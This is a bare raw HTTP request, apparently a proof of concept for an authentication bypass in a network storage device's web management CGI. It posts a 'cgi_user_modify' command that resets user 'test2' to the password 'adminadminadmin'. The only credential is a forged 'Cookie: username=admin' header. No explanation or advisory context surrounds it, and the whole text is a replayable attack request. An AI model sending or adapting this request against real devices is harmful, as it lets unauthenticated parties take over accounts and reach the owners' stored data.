POST /cgi-bin/account_mgr.cgi HTTP/1.1
Host: 192.168.1.201
Content-Length: 218
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://192.168.1.201
Referer: http://192.168.1.201/web/management.html?id=account&v=1720428557001
Accept-Encoding: gzip, deflate, br
Cookie: username=admin
Connection: keep-alive

cmd=cgi_user_modify&name=test2&pw=adminadminadmin&ftp=false&group=&available1=null&available2=null&available3=null&available4=null&read_list=&write_list=&decline_list=&uncheck_list=&m_pw=0&m_group=0&m_quota=0&m_share=0